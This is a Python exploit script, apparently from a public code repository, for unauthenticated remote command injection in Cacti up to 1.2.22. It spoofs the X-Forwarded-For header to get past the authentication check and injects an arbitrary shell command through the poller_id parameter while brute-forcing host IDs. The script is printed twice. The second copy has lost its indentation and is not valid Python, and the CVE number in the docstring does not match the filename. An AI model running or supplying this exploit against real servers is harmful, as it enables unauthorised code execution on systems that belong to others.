bryanmcnulty/CVE-2022-46169.py

## CVE-2022-46169.py
#!/usr/bin/env python3

'''
 *  Written for a CTF :)
 *  ---
 *  Author:   Bryan McNulty
 *  Contact:  bryanmcnulty@protonmail.com
 *  Blog:     https://bryanmcnulty.github.io
 *  GitHub:   https://github.com/bryanmcnulty
 *  LinkedIn: https://www.linkedin.com/in/bryanmcnulty
 *  ---
 *
 *  Dependencies:
 *    - argparse
 *    - requests
 *
 *  Unauthenticated command injection on Cacti <= 1.2.22 :: CVE-2022-24715
'''

import requests
import argparse


def main():
  parser = argparse.ArgumentParser(prog='CVE-2022-46169.py', description='Unauthenticated RCE on Cacti <= 1.2.22')
  parser.add_argument('target', help='Target URL')
  parser.add_argument('-c', '--command', required=True, help='Command to run on target')

  group = parser.add_argument_group('Tuning')
  group.add_argument('-i', '--host-ids', metavar='MAX', type=int, default=100, help='Maximum number of host IDs to test')
  group.add_argument('-l', '--local-data-ids', metavar='MAX', type=int, default=50, help='Number of local data IDs to test')

  args = parser.parse_args()

  if args.target.startswith('http://') or args.target.startswith('https://'):
    target = args.target.rstrip('/')
  else:
    target = 'http://'+args.target.rstrip('/')

  for host_id in range(args.host_ids):
    params = {
      'action': 'polldata',
      'host_id': host_id,
      'poller_id': '; ' + args.command,
      'local_data_ids[]': list(range(args.local_data_ids))
    }
    try:
      response = requests.get(target + '/remote_agent.php', params=params, headers={'X-Forwarded-For': '127.0.0.1'})
      if 'proc' in response.text:
        print('Success!')
        break
    except requests.exceptions.InvalidURL:
      print('Invalid target URL')
      exit(1)


if __name__ == '__main__':
  main()
	#!/usr/bin/env python3

	'''
	* Written for a CTF :)
	* ---
	* Author: Bryan McNulty
	* Contact: bryanmcnulty@protonmail.com
	* Blog: https://bryanmcnulty.github.io
	* GitHub: https://github.com/bryanmcnulty
	* LinkedIn: https://www.linkedin.com/in/bryanmcnulty
	* ---
	*
	* Dependencies:
	* - argparse
	* - requests
	*
	* Unauthenticated command injection on Cacti <= 1.2.22 :: CVE-2022-24715
	'''

	import requests
	import argparse


	def main():
	parser = argparse.ArgumentParser(prog='CVE-2022-46169.py', description='Unauthenticated RCE on Cacti <= 1.2.22')
	parser.add_argument('target', help='Target URL')
	parser.add_argument('-c', '--command', required=True, help='Command to run on target')

	group = parser.add_argument_group('Tuning')
	group.add_argument('-i', '--host-ids', metavar='MAX', type=int, default=100, help='Maximum number of host IDs to test')
	group.add_argument('-l', '--local-data-ids', metavar='MAX', type=int, default=50, help='Number of local data IDs to test')

	args = parser.parse_args()

	if args.target.startswith('http://') or args.target.startswith('https://'):
	target = args.target.rstrip('/')
	else:
	target = 'http://'+args.target.rstrip('/')

	for host_id in range(args.host_ids):
	params = {
	'action': 'polldata',
	'host_id': host_id,
	'poller_id': '; ' + args.command,
	'local_data_ids[]': list(range(args.local_data_ids))
	}
	try:
	response = requests.get(target + '/remote_agent.php', params=params, headers={'X-Forwarded-For': '127.0.0.1'})
	if 'proc' in response.text:
	print('Success!')
	break
	except requests.exceptions.InvalidURL:
	print('Invalid target URL')
	exit(1)


	if __name__ == '__main__':
	main()